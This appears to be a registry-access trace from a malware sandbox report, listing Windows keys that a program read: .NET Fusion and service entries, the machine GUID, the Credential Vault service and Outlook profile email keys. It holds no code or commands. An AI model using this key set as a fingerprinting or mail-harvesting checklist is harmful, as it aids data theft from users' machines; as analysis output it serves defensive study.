HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ErrorControl
